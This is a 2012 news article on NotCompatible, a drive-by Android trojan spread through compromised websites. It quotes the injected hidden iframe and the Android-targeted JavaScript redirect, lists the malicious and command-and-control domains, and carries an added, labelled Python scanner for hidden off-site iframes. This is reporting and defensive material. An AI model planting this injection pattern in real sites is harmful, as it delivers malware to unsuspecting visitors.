UPDATED 11:00 EDT / MAY 03 2012

Malware Hits the Mobile Web, Targets Android Handsets

Fandroids are plagued with malware left and right. Their devices can be infected by apps downloaded from Google Play, and especially by apps from unofficial third-party app stores. Worse, drive-by download malware is now attacking Android devices.

NotCompatible

Lookout Mobile Security recently identified drive-by download malware dubbed NotCompatible. Drive-by downloads are common on PCs: when a user visits an infected site, the malware silently infects the computer if its security measures are not up to date.

NotCompatible works in a similar manner: when someone visits an infected site on an Android device, the web browser automatically downloads an application, and when the download finishes, the device displays a notification prompting the user to tap it to install the downloaded app. The installation only proceeds if the “Unknown sources” setting is enabled (this feature is commonly referred to as “sideloading”); otherwise it is blocked.

Lookout’s report stated that infected websites commonly have the following code inserted into the bottom of each page:
<iframe
style="visibility: hidden; display: none; display: none;"
src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>

When a PC web browser is used to access the infected site, a “not found” error appears, but if a web browser containing the word “Android” in its user-agent header accesses the page, the following is returned:

<html><head></head><body><script type="text/javascript">window.top.location.href = "hxxp://androidonlinefix.info/fix1.php";</script></body></html>
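For site owners checking their own pages for this kind of injection, the following added example (not from Lookout's report or the original article) scans HTML for iframes that are hidden by inline style and load from a different host. The `example.com` site name and the sample page are constructed for illustration; the injected iframe markup is the one quoted above.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

HIDING_RULES = {("display", "none"), ("visibility", "hidden")}


def parse_style(style):
    """Turn an inline style string into a set of (property, value) pairs."""
    pairs = (decl.partition(":") for decl in style.split(";"))
    return {(p.strip().lower(), v.strip().lower()) for p, sep, v in pairs if sep}


class HiddenIframeFinder(HTMLParser):
    """Collect (line, host) for hidden iframes loading from outside site_host."""
    def __init__(self, site_host):
        super().__init__()
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        if tag != "iframe":
            return
        attr = {k: (v or "") for k, v in attrs}
        hidden = bool(parse_style(attr.get("style", "")) & HIDING_RULES)
        src = attr.get("src", "").strip()
        if src.lower().startswith("hxxp"):  # restore a defanged scheme, as quoted in reports
            src = "http" + src[4:]
        host = (urlparse(src).hostname or "").lower()
        same_site = host == self.site_host or host.endswith("." + self.site_host)
        if hidden and host and not same_site:
            self.findings.append((self.getpos()[0], host))


def find_hidden_iframes(html, site_host):
    finder = HiddenIframeFinder(site_host)
    finder.feed(html)
    return finder.findings


# Constructed sample page: a visible same-site embed plus the iframe quoted in the article.
SAMPLE = """<html><body><p>Welcome</p>
<iframe src="http://video.example.com/embed/1" width="560"></iframe>
<iframe style="visibility: hidden; display: none; display: none;"
 src="hxxp://gaoanalitics.info/?id={1234567890-0000-DEAD-BEEF-133713371337}"></iframe>
</body></html>"""

if __name__ == "__main__":
    for line, host in find_hidden_iframes(SAMPLE, "example.com"):
        print(f"line {line}: hidden iframe loads from {host}")
```

The check only covers inline styles; frames hidden through a stylesheet class or script would need a rendered-DOM inspection instead.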

Lookout identified the following sites serving malicious Android apps:

  • gaoanalitics.info
  • androidonlinefix.info

The command and control (C&C) domains include:

  • notcompatibleapp.eu

Lookout assured their subscribers that they are protected from NotCompatible, and reiterated that unless the app is actually installed, the device won’t become infected.

“Based on our current research, NotCompatible is a new Android trojan that appears to serve as a simple TCP relay / proxy while posing as a system update,” Lookout wrote in their updated report.

“This threat does not currently appear to cause any direct harm to a target device, but could potentially be used to gain illicit access to private networks by turning an infected Android device into a proxy. As previously mentioned, this appears to be the first time that compromised websites have been used to distribute malware targeting Android devices.”

